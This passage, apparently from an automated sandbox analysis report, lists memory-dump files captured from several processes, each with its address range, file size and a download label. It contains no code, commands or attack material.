                                                                                                                    • memory/2216-207-0x0000019214730000-0x0000019214732000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2216-206-0x0000019214730000-0x0000019214732000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2216-218-0x00000192147B3000-0x00000192147B5000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2216-215-0x00000192147B0000-0x00000192147B2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2216-214-0x0000019214730000-0x0000019214732000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2216-212-0x000001922E7E0000-0x000001922E7E1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2216-243-0x000001922E770000-0x000001922E771000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2332-856-0x00000000049A2000-0x00000000049A3000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2332-978-0x000000007F6F0000-0x000000007F6F1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2332-855-0x00000000049A0000-0x00000000049A1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2376-457-0x0000000000FA3000-0x0000000000FA4000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2376-329-0x0000000000FA0000-0x0000000000FA1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2376-330-0x0000000000FA2000-0x0000000000FA3000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2412-353-0x00000000053F0000-0x00000000059F6000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.0MB

                                                                                                                      Download

                                                                                                                    • memory/2472-427-0x0000019DD9BF6000-0x0000019DD9BF8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2472-439-0x0000019DD9BF8000-0x0000019DD9BFA000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2472-426-0x0000019DD9BF3000-0x0000019DD9BF5000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2472-425-0x0000019DD9BF0000-0x0000019DD9BF2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2496-164-0x0000000002560000-0x00000000025F1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      580KB

                                                                                                                      Download

                                                                                                                    • memory/2868-150-0x0000000000400000-0x0000000000491000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      580KB

                                                                                                                      Download

                                                                                                                    • memory/2868-147-0x0000000000720000-0x00000000007AE000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      568KB

                                                                                                                      Download

                                                                                                                    • memory/2868-138-0x0000000000631000-0x0000000000680000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      316KB

                                                                                                                      Download

                                                                                                                    • memory/2896-1139-0x0000000004E82000-0x0000000004E83000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2896-486-0x00000000068C0000-0x00000000068C1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2896-1164-0x000000007F200000-0x000000007F201000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2896-1138-0x0000000004E80000-0x0000000004E81000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2896-488-0x00000000068C2000-0x00000000068C3000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2896-603-0x000000007FA60000-0x000000007FA61000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/3040-119-0x0000000000D50000-0x0000000000D66000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      88KB

                                                                                                                      Download

                                                                                                                    • memory/3060-675-0x000001EE438E6000-0x000001EE438E8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/3060-854-0x000001EE438E8000-0x000001EE438E9000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/3060-677-0x000001EE438E3000-0x000001EE438E5000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/3060-673-0x000001EE438E0000-0x000001EE438E2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/3220-284-0x0000000005522000-0x0000000005523000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/3220-203-0x0000000000CF3000-0x00000000010F9000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.0MB

                                                                                                                      Download

                                                                                                                    • memory/3220-281-0x0000000001100000-0x0000000001502000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.0MB

                                                                                                                      Download

                                                                                                                    • memory/3220-286-0x0000000005524000-0x0000000005525000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/3220-282-0x0000000000400000-0x0000000000841000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.3MB

                                                                                                                      Download

                                                                                                                    • memory/3220-283-0x0000000005520000-0x0000000005521000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/3220-285-0x0000000005523000-0x0000000005524000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/3232-354-0x000001AD99890000-0x000001AD99892000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/3232-381-0x000001AD99896000-0x000001AD99898000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/3232-355-0x000001AD99893000-0x000001AD99895000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/3272-193-0x0000000005170000-0x0000000005171000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/3272-185-0x00000000027A0000-0x00000000027BC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      112KB

                                                                                                                      Download

                                                                                                                    • memory/3272-250-0x0000000006950000-0x0000000006951000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/3272-199-0x0000000005174000-0x0000000005175000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/3272-175-0x0000000000A40000-0x0000000000A71000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      196KB

                                                                                                                      Download

                                                                                                                    • memory/3272-198-0x0000000005173000-0x0000000005174000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/3272-197-0x0000000005172000-0x0000000005173000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/3396-182-0x00000267CDF50000-0x00000267CDF52000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/3396-180-0x00000267E6C60000-0x00000267E705F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.0MB

                                                                                                                      Download

                                                                                                                    • memory/3396-196-0x00000267CDF56000-0x00000267CDF57000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/3396-195-0x00000267CDF55000-0x00000267CDF56000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/3396-145-0x0000000000BC0000-0x0000000001A06000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      14.3MB

                                                                                                                      Download

                                                                                                                    • memory/3396-194-0x00000267CDF53000-0x00000267CDF55000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download